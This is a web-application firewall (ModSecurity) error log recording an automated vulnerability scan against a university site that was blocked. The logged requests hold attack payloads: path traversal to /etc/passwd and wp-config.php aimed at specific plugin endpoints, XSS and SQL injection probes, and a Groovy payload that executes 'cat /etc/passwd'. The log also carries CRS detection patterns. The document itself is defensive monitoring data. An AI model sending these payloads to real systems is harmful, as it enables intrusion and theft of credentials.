[Tue Aug 29 11:47:48.391962 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:files. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:files: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZO14dMCo-f0AAAjFofoAAAAF"]
[Tue Aug 29 11:47:48.476100 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:phps_query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:phps_query: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/search"] [unique_id "ZO14dMCo-f0AAAkdu3cAAAAO"]
[Tue Aug 29 11:47:49.491530 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjCbLMAAAAB"]
[Tue Aug 29 11:47:49.572521 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkdu3sAAAAO"]
[Tue Aug 29 11:47:50.356312 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkBKooAAAAb"]
[Tue Aug 29 11:47:50.396038 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkdu30AAAAO"]
[Tue Aug 29 11:47:50.435760 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAhl0MgAAAAi"]
[Tue Aug 29 11:47:50.442682 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAjL8XEAAAAR"]
[Tue Aug 29 11:47:51.421083 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAjCbLwAAAAB"]
[Tue Aug 29 11:47:51.462558 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "mbkm.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAjCbL4AAAAB"]
[Tue Aug 29 11:47:52.467741 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14eMCo-f0AAAkAL9YAAAAU"]
[Tue Aug 29 11:47:52.583487 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14eMCo-f0AAAj11@kAAAAa"]
[Tue Aug 29 11:47:53.408254 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:show_file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:show_file_name: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ACSServer/DownloadFileServlet"] [unique_id "ZO14ecCo-f0AAAjtc5gAAAAX"]
[Tue Aug 29 11:47:56.366933 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fMCo-f0AAAkNPp4AAAAI"]
[Tue Aug 29 11:47:57.404096 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkdu5YAAAAO"]
[Tue Aug 29 11:47:58.432699 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAhl0NkAAAAi"]
[Tue Aug 29 11:47:58.464165 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkaDAIAAAAJ"]
[Tue Aug 29 11:47:59.420340 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAjy52sAAAAG"]
[Tue Aug 29 11:48:03.379475 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file_path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZO14g8Co-f0AAAkaDAsAAAAJ"]
[Tue Aug 29 11:48:03.381520 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14g8Co-f0AAAjCbNsAAAAB"]
[Tue Aug 29 11:48:04.460277 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO14hMCo-f0AAAkdu70AAAAO"]
[Tue Aug 29 11:48:05.367910 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hcCo-f0AAAjtc6UAAAAX"]
[Tue Aug 29 11:48:05.427821 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: now( found within ARGS:id: -1 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1  frmasterom {prefix}user"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plug/comment/commentList.asp"] [unique_id "ZO14hcCo-f0AAAjbw7AAAAAW"]
[Tue Aug 29 11:48:06.349215 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14hsCo-f0AAAkksHAAAAAA"]
[Tue Aug 29 11:48:06.424477 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAj12B8AAAAa"]
[Tue Aug 29 11:48:07.522878 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAkksHYAAAAA"]
[Tue Aug 29 11:48:08.427753 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjbw7wAAAAW"]
[Tue Aug 29 11:48:09.377726 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAklexIAAAAD"]
[Tue Aug 29 11:48:09.477378 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAklexcAAAAD"]
[Tue Aug 29 11:48:11.532755 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjtc7wAAAAX"]
[Tue Aug 29 11:48:12.505669 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkksJ0AAAAA"]
[Tue Aug 29 11:48:12.847077 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoThAAAAAH"]
[Tue Aug 29 11:48:13.424636 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "mbkm.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkAMB4AAAAU"]
[Tue Aug 29 11:48:13.424682 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/xmlpserver/ReportTemplateService.xls"] [unique_id "ZO14jcCo-f0AAAkAMB4AAAAU"]
[Tue Aug 29 11:48:17.825012 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:loginParams. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x22,\\x22 found within ARGS:loginParams: {\\x22username\\x22:\\x22cmuser\\x22,\\x22password\\x22:\\x22\\x22,\\x22authType\\x22:0}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fpui/loginServlet"] [unique_id "ZO14kcCo-f0AAAjM7KAAAAAT"]
[Tue Aug 29 11:48:18.480038 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14ksCo-f0AAAjbw-EAAAAW"]
